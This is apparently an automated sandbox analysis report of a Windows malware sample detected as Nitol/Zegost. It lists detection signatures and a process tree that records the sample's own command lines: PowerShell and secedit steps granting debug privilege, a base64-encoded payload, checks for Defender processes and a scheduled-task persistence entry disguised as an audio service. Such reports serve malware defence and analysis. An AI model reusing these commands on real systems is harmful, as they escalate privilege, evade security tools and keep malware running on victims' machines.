Edit tour

Windows Analysis Report
KL-3.1.16.exe

Overview

General Information

Sample name:	KL-3.1.16.exe
Analysis ID:	1582021
MD5:	a741fbd12088e596142d3717b48502cf
SHA1:	0f42f37a6be6922f0f3ef7d751dedce6abce99bf
SHA256:	c88e2057d44ad73fa1d07ff1af68345ffeb3e153801e85ee4d294d5676a58de5
Tags:	exeuser-aachum
Infos:

Detection

Nitol, Zegost

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for dropped file

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected Nitol

Yara detected Zegost

AI detected suspicious sample

Contains functionality to capture and log keystrokes

Contains functionality to modify Windows User Account Control (UAC) settings

Disable UAC(promptonsecuredesktop)

Disables UAC (registry)

Encrypted powershell cmdline option found

Found stalling execution ending in API Sleep call

Found suspicious powershell code related to unpacking or dynamic code loading

Machine Learning detection for dropped file

PE file contains section with special chars

Query firmware table information (likely to detect VMs)

Sigma detected: Base64 Encoded PowerShell Command Detected

Sigma detected: Execution from Suspicious Folder

Sigma detected: Parent in Public Folder Suspicious Process

Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet

Sigma detected: Suspicious Program Location with Network Connections

Suspicious powershell command line found

Tries to delay execution (extensive OutputDebugStringW loop)

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Uses schtasks.exe or at.exe to add and modify task schedules

AV process strings found (often used to terminate AV products)

Abnormal high CPU Usage

Contains capabilities to detect virtual machines

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to check if a window is minimized (may be used to check if an application is visible)

Contains functionality to clear windows event logs (to hide its activities)

Contains functionality to dynamically determine API calls

Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)

Contains functionality to launch a process as a different user

Contains functionality to launch a program with higher privileges

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality to retrieve information about pressed keystrokes

Contains functionality to shutdown / reboot the system

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates COM task schedule object (often to register a task for autostart)

Creates a process in suspended mode (likely to inject code)

Creates files inside the system directory

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Drops PE files

Drops PE files to the application program directory (C:\ProgramData)

Enables debug privileges

Entry point lies outside standard sections

Extensive use of GetProcAddress (often used to hide API calls)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found decision node followed by non-executed suspicious APIs

Found dropped PE file which has not been started or loaded

Found evasive API chain (may stop execution after accessing registry keys)

Found evasive API chain (may stop execution after checking a module file name)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

May sleep (evasive loops) to hinder dynamic analysis

PE / OLE file has an invalid certificate

PE file contains an invalid checksum

PE file contains sections with non-standard names

Potential key logger detected (key state polling based)

Queries disk information (often used to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: CurrentVersion Autorun Keys Modification

Sigma detected: Wow6432Node CurrentVersion Autorun Keys Modification

Too many similar processes found

Uses code obfuscation techniques (call, push, ret)

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Yara signature match

Classification

Process Tree

System is w10x64

KL-3.1.16.exe (PID: 2632 cmdline: "C:\Users\user\Desktop\KL-3.1.16.exe" MD5: A741FBD12088E596142D3717B48502CF)

irsetup.exe (PID: 6980 cmdline: "C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe" __IRAOFF:5904754 "__IRAFN:C:\Users\user\Desktop\KL-3.1.16.exe" "__IRCT:3" "__IRTSS:0" "__IRSID:S-1-5-21-2246122658-3693405117-2476756634-1003" MD5: 2A7D5F8D3FB4AB753B226FD88D31453B)

powershell.exe (PID: 2356 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"msmpeng.exe\")); MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 2496 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 5660 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"securityhealthsystray.exe\")); MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 5776 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 5704 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"mpcopyaccelerator.exe\")); MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 420 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 2536 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"MpDefenderCoreService.exe\")); MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 4896 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 4600 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $mypid=(Get-WmiObject -Query 'select ParentProcessId from Win32_Process where ProcessId=6980').ParentProcessId;if($mypid){Stop-Process -Id $mypid -Force;} MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 1008 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 3204 cmdline: "C:\Windows\System32\cmd.exe" /c start "title" "C:\Users\Public\Documents\B8_2rBP8O\5ar6QsR4e.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 2168 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

5ar6QsR4e.exe (PID: 5920 cmdline: "C:\Users\Public\Documents\B8_2rBP8O\5ar6QsR4e.exe" MD5: 4764020339A4883862B79B60461B00D1)

powershell.exe (PID: 1584 cmdline: powershell.exe -NoProfile -C "Set-Content -Value @('[Unicode]','Unicode=yes','[Version]','signature=\"$CHICAGO$\"','Revision=1','[Privilege Rights]','SeDebugPrivilege = *S-1-5-18','[File Security]','\"C:\ProgramData\Program\",0,\"D:AR(D;OICI;DTSDRCWD;;;WD)\"') -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.inf')) -Encoding Unicode; secedit.exe /configure /db ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.sdb')) /cfg ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.inf')) /overwrite /log ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.log')) /quiet; Remove-Item -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.*')) -Force;" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 4896 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

SecEdit.exe (PID: 4040 cmdline: "C:\Windows\system32\SecEdit.exe" /configure /db C:\Users\user\AppData\Local\Temp\SeDebugPrivilege1.sdb /cfg C:\Users\user\AppData\Local\Temp\SeDebugPrivilege1.inf /overwrite /log C:\Users\user\AppData\Local\Temp\SeDebugPrivilege1.log /quiet MD5: BFC13856291E4B804D33BBAEFC8CB3B5)

powershell.exe (PID: 1340 cmdline: powershell.exe -NoProfile -C "Set-Content -Value @('[Unicode]','Unicode=yes','[Version]','signature=\"$CHICAGO$\"','Revision=1','[Privilege Rights]','SeDebugPrivilege = *S-1-5-18','[File Security]','\"C:\ProgramData\Data\",0,\"D:AR(D;OICI;DTSDRCWD;;;WD)\"') -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege3.inf')) -Encoding Unicode; secedit.exe /configure /db ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege3.sdb')) /cfg ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege3.inf')) /overwrite /log ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege3.log')) /quiet; Remove-Item -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege3.*')) -Force;" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 4176 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

SecEdit.exe (PID: 572 cmdline: "C:\Windows\system32\SecEdit.exe" /configure /db C:\Users\user\AppData\Local\Temp\SeDebugPrivilege3.sdb /cfg C:\Users\user\AppData\Local\Temp\SeDebugPrivilege3.inf /overwrite /log C:\Users\user\AppData\Local\Temp\SeDebugPrivilege3.log /quiet MD5: BFC13856291E4B804D33BBAEFC8CB3B5)

powershell.exe (PID: 2536 cmdline: powershell.exe -NoProfile -C "[IO.File]::WriteAllBytes([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.inf'), [Convert]::FromBase64String('//5bAFUAbgBpAGMAbwBkAGUAXQANAAoAVQBuAGkAYwBvAGQAZQA9AHkAZQBzAA0ACgBbAFYAZQByAHMAaQBvAG4AXQANAAoAcwBpAGcAbgBhAHQAdQByAGUAPQAiACQAQwBIAEkAQwBBAEcATwAkACIADQAKAFIAZQB2AGkAcwBpAG8AbgA9ADEADQAKAFsAUAByAGkAdgBpAGwAZQBnAGUAIABSAGkAZwBoAHQAcwBdAA0ACgBTAGUARABlAGIAdQBnAFAAcgBpAHYAaQBsAGUAZwBlACAAPQAgACoAUwAtADEALQA1AC0AMQA4AA0ACgA=')); secedit.exe /configure /db ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.sdb')) /cfg ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.inf')) /overwrite /log ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.log')) /quiet; Remove-Item -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.*')) -Force;" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 6840 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

SecEdit.exe (PID: 5224 cmdline: "C:\Windows\system32\SecEdit.exe" /configure /db C:\Users\user\AppData\Local\Temp\SeDebugPrivilege4.sdb /cfg C:\Users\user\AppData\Local\Temp\SeDebugPrivilege4.inf /overwrite /log C:\Users\user\AppData\Local\Temp\SeDebugPrivilege4.log /quiet MD5: BFC13856291E4B804D33BBAEFC8CB3B5)

powershell.exe (PID: 2632 cmdline: powershell.exe -NoProfile -C "Set-Content -Value @('[Unicode]','Unicode=yes','[Version]','signature=\"$CHICAGO$\"','Revision=1','[Privilege Rights]','SeDebugPrivilege = *S-1-5-18','[File Security]','\"C:\ProgramData\Program\",0,\"D:AR(D;OICI;DTSDRCWD;;;WD)\"') -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.inf')) -Encoding Unicode; secedit.exe /configure /db ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.sdb')) /cfg ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.inf')) /overwrite /log ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.log')) /quiet; Remove-Item -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.*')) -Force;" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

cmd.exe (PID: 7064 cmdline: cmd /c echo.>c:\inst.ini MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 3908 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 7352 cmdline: cmd.exe /c schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 7360 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

schtasks.exe (PID: 7412 cmdline: schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml MD5: 48C2FE20575769DE916F48EF0676A965)

powershell.exe (PID: 7404 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"5ar6QsR4e.exe\")); MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 7420 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 7696 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"5ar6QsR4e.exe\")); MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 7704 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 880 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"5ar6QsR4e.exe\")); MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 7388 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 7100 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"5ar6QsR4e.exe\")); MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 5372 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 7960 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"5ar6QsR4e.exe\")); MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 5264 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 5796 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"5ar6QsR4e.exe\")); MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 3064 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 760 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"5ar6QsR4e.exe\")); MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 3460 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 7488 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"5ar6QsR4e.exe\")); MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 7400 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 7520 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"5ar6QsR4e.exe\")); MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 7436 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 7700 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"5ar6QsR4e.exe\")); MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 7784 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 4816 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"5ar6QsR4e.exe\")); MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 6872 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 5644 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"5ar6QsR4e.exe\")); MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 2620 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 7324 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"5ar6QsR4e.exe\")); MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 5292 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 6780 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"5ar6QsR4e.exe\")); MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 1816 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 2476 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"5ar6QsR4e.exe\")); MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 2396 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 5740 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"5ar6QsR4e.exe\")); MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 2192 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 8100 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"5ar6QsR4e.exe\")); MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 8080 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 7968 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"5ar6QsR4e.exe\")); MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 7992 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 1540 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"5ar6QsR4e.exe\")); MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 1216 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 2168 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"5ar6QsR4e.exe\")); MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 8160 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 7368 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"5ar6QsR4e.exe\")); MD5: 04029E121A0CFA5991749937DD22A1D9)

powershell.exe (PID: 7768 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"5ar6QsR4e.exe\")); MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 6272 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 6696 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"5ar6QsR4e.exe\")); MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 7220 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 3548 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"5ar6QsR4e.exe\")); MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 6336 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 3476 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"5ar6QsR4e.exe\")); MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 3360 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 1072 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"5ar6QsR4e.exe\")); MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 6864 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 1132 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"5ar6QsR4e.exe\")); MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 2456 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

conhost.exe (PID: 3892 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

SecEdit.exe (PID: 936 cmdline: "C:\Windows\system32\SecEdit.exe" /configure /db C:\Users\user\AppData\Local\Temp\SeDebugPrivilege1.sdb /cfg C:\Users\user\AppData\Local\Temp\SeDebugPrivilege1.inf /overwrite /log C:\Users\user\AppData\Local\Temp\SeDebugPrivilege1.log /quiet MD5: BFC13856291E4B804D33BBAEFC8CB3B5)

rundll32.exe (PID: 2544 cmdline: C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding MD5: EF3179D498793BF4234F708D3BE28633)

iusb3mon.exe (PID: 4196 cmdline: C:\ProgramData\program\iusb3mon.exe MD5: 4764020339A4883862B79B60461B00D1)

powershell.exe (PID: 7816 cmdline: powershell.exe -NoProfile -C "Set-Content -Value @('[Unicode]','Unicode=yes','[Version]','signature=\"$CHICAGO$\"','Revision=1','[Privilege Rights]','SeDebugPrivilege = *S-1-5-18','[File Security]','\"C:\ProgramData\Program\",0,\"D:AR(D;OICI;DTSDRCWD;;;WD)\"') -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.inf')) -Encoding Unicode; secedit.exe /configure /db ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.sdb')) /cfg ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.inf')) /overwrite /log ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.log')) /quiet; Remove-Item -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.*')) -Force;" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 7836 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

SecEdit.exe (PID: 7528 cmdline: "C:\Windows\system32\SecEdit.exe" /configure /db C:\Users\user\AppData\Local\Temp\SeDebugPrivilege1.sdb /cfg C:\Users\user\AppData\Local\Temp\SeDebugPrivilege1.inf /overwrite /log C:\Users\user\AppData\Local\Temp\SeDebugPrivilege1.log /quiet MD5: BFC13856291E4B804D33BBAEFC8CB3B5)

powershell.exe (PID: 7824 cmdline: powershell.exe -NoProfile -C "Set-Content -Value @('[Unicode]','Unicode=yes','[Version]','signature=\"$CHICAGO$\"','Revision=1','[Privilege Rights]','SeDebugPrivilege = *S-1-5-18','[File Security]','\"C:\ProgramData\Data\",0,\"D:AR(D;OICI;DTSDRCWD;;;WD)\"') -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege3.inf')) -Encoding Unicode; secedit.exe /configure /db ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege3.sdb')) /cfg ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege3.inf')) /overwrite /log ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege3.log')) /quiet; Remove-Item -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege3.*')) -Force;" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 7852 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

SecEdit.exe (PID: 7412 cmdline: "C:\Windows\system32\SecEdit.exe" /configure /db C:\Users\user\AppData\Local\Temp\SeDebugPrivilege3.sdb /cfg C:\Users\user\AppData\Local\Temp\SeDebugPrivilege3.inf /overwrite /log C:\Users\user\AppData\Local\Temp\SeDebugPrivilege3.log /quiet MD5: BFC13856291E4B804D33BBAEFC8CB3B5)

powershell.exe (PID: 7844 cmdline: powershell.exe -NoProfile -C "[IO.File]::WriteAllBytes([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.inf'), [Convert]::FromBase64String('//5bAFUAbgBpAGMAbwBkAGUAXQANAAoAVQBuAGkAYwBvAGQAZQA9AHkAZQBzAA0ACgBbAFYAZQByAHMAaQBvAG4AXQANAAoAcwBpAGcAbgBhAHQAdQByAGUAPQAiACQAQwBIAEkAQwBBAEcATwAkACIADQAKAFIAZQB2AGkAcwBpAG8AbgA9ADEADQAKAFsAUAByAGkAdgBpAGwAZQBnAGUAIABSAGkAZwBoAHQAcwBdAA0ACgBTAGUARABlAGIAdQBnAFAAcgBpAHYAaQBsAGUAZwBlACAAPQAgACoAUwAtADEALQA1AC0AMQA4AA0ACgA=')); secedit.exe /configure /db ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.sdb')) /cfg ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.inf')) /overwrite /log ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.log')) /quiet; Remove-Item -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.*')) -Force;" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 7912 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

SecEdit.exe (PID: 2032 cmdline: "C:\Windows\system32\SecEdit.exe" /configure /db C:\Users\user\AppData\Local\Temp\SeDebugPrivilege4.sdb /cfg C:\Users\user\AppData\Local\Temp\SeDebugPrivilege4.inf /overwrite /log C:\Users\user\AppData\Local\Temp\SeDebugPrivilege4.log /quiet MD5: BFC13856291E4B804D33BBAEFC8CB3B5)

cmd.exe (PID: 7516 cmdline: cmd.exe /c schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 7524 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

schtasks.exe (PID: 4596 cmdline: schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml MD5: 48C2FE20575769DE916F48EF0676A965)

